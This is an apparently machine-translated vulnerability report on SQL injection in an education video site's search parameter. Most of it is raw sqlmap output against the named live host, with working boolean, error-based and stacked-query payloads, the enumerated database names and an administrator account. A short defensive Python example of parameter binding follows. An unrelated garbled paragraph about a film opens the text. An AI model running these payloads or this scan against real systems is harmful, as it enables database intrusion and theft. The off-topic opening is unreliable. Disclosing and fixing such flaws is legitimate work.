SQL injection at Superstar Education exposes multiple databases and leaks a large amount of data

Source: Internet
Author: User
Tags microsoft sql server 2005 microsoft iis


Avengers 2 tells the story of an overconfident local programmer who writes a buggy program and then has to work overtime to fix the vulnerability. Also known as: "On the Self-Cultivation of a Programmer", "Raytheon Is a Good Product Manager", and "Products Without Beta Testing Always Go Wrong". The differences in interaction caused by different UIs are also sorted out while crying over self-written bugs.

F:\Python26\sqlmap>sqlmap.py -u "http://admin.eryavideo.com/outreachinfopeaker.aspx?type=0&wd=a" --dbs

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prio consent is illegal. It is the end user's responsibility to obey all applocal, state and federal laws. Developers assume no liability and are nosible for any misuse or damage caused by this program

[*] starting at 18:58:44

[18:58:44] [WARNING] using 'C:\Users\Administrator\.sqlmap\output' as th directory
[18:58:44] [INFO] resuming back-end DBMS 'microsoft sql server'
[18:58:44] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(sts:
---
Place: GET
Parameter: wd
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: type=0&wd=a%' AND 7734=7734 AND '%'='

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING
    Payload: type=0&wd=a%' AND 3045=CONVERT(INT,(SELECT CHAR(113)+CHAR(1(102)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (3045=3045) THEN CHAR(49) E(48) END))+CHAR(113)+CHAR(121)+CHAR(115)+CHAR(106)+CHAR(113))) AND '%'='

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: type=0&wd=a%'; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: type=0&wd=a%' WAITFOR DELAY '0:0:5'--
---
[18:58:44] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.5072
back-end DBMS: Microsoft SQL Server 2005
[18:58:44] [INFO] fetching database names
[18:58:44] [INFO] the SQL query used returns 19 entries
[18:58:44] [INFO] resumed: 2011erya100
[18:58:44] [INFO] resumed: AdminSSreaderVideo
[18:58:44] [INFO] resumed: EduErya100
[18:58:44] [INFO] resumed: erya100data
[18:58:44] [INFO] resumed: EryaVideo
[18:58:44] [INFO] resumed: JiJiaoVideo
[18:58:44] [INFO] resumed: JXSSreaderVideo
[18:58:44] [INFO] resumed: master
[18:58:44] [INFO] resumed: model
[18:58:44] [INFO] resumed: msdb
[18:58:44] [INFO] resumed: SSreaderVideofxhy
[18:58:44] [INFO] resumed: ssreadervideosxtlgc
[18:58:44] [INFO] resumed: SSVideoCN
[18:58:44] [WARNING] cannot properly display Unicode characters inside WS command prompt (http://bugs.python.org/issue1602). All unhandled occurll result in replacement with '?' character. Please, find proper charactsentation inside corresponding output files.
[18:58:44] [INFO] resumed: ssvideo????
[18:58:44] [INFO] resumed: tempdb
[18:58:44] [INFO] resumed: tmp
[18:58:44] [INFO] resumed: ZaiFanVideo
[18:58:44] [INFO] resumed: ZaiFanVideoNew
[18:58:44] [INFO] resumed: zxxvideo
available databases [19]:
[*] 2011erya100
[*] AdminSSreaderVideo
[*] EduErya100
[*] erya100data
[*] EryaVideo
[*] JiJiaoVideo
[*] JXSSreaderVideo
[*] master
[*] model
[*] msdb
[*] SSreaderVideofxhy
[*] ssreadervideosxtlgc
[*] SSVideoCN
[*] ssvideo????
[*] tempdb
[*] tmp
[*] ZaiFanVideo
[*] ZaiFanVideoNew
[*] zxxvideo

[18:58:44] [INFO] fetched data logged to text files under 'C:\Users\Admir\.sqlmap\output\admin.eryavideo.com'

[*] shutting down at 18:58:44

database management system users privileges:
[*] sa (administrator)
[*] ssvideo_user

 

Solution:

Filter
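
What filtering the wd search parameter has to achieve, as an added example that is not code from the original report or the affected site: the concatenated LIKE query answers the boolean probe from the sqlmap output differently for true and false, while the bound and wildcard-escaped query treats it as plain text. Assumptions: Python's sqlite3 stands in for SQL Server 2005, and the speaker table, its rows and the function names are hypothetical.

```python
import sqlite3

def make_db():
    """In-memory stand-in database; table, column and rows are constructed."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE speaker (id INTEGER PRIMARY KEY, name TEXT)")
    db.executemany("INSERT INTO speaker (name) VALUES (?)",
                   [("Zhang Wei",), ("Li Na",), ("100% Physics",)])
    return db

def search_concat(db, wd):
    """Vulnerable pattern: wd is pasted into the SQL text of a LIKE filter."""
    sql = "SELECT name FROM speaker WHERE name LIKE '%" + wd + "%'"
    return [row[0] for row in db.execute(sql)]

def escape_like(wd, esc="\\"):
    """Make LIKE wildcards in user input match literally.
    The escape character is handled first so it is not escaped twice.
    On SQL Server, '[' is also a LIKE wildcard and needs the same treatment."""
    for ch in (esc, "%", "_"):
        wd = wd.replace(ch, esc + ch)
    return wd

def search_bound(db, wd):
    """Fixed pattern: wd travels as a bound parameter, never as SQL text."""
    sql = "SELECT name FROM speaker WHERE name LIKE ? ESCAPE '\\'"
    return [row[0] for row in db.execute(sql, ("%" + escape_like(wd) + "%",))]

# The boolean-based probe from the sqlmap output above, and its false twin.
PROBE_TRUE = "a%' AND 7734=7734 AND '%'='"
PROBE_FALSE = "a%' AND 7734=7735 AND '%'='"

if __name__ == "__main__":
    db = make_db()
    for label, search in (("concat", search_concat), ("bound", search_bound)):
        # concat: the true probe returns rows and the false probe returns none.
        # bound: both probes return no rows, so there is no oracle.
        print(label, search(db, "a"), search(db, PROBE_TRUE),
              search(db, PROBE_FALSE))
```

In ADO.NET the same binding is done with SqlParameter objects on the SqlCommand instead of building the query string from Request values.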

 
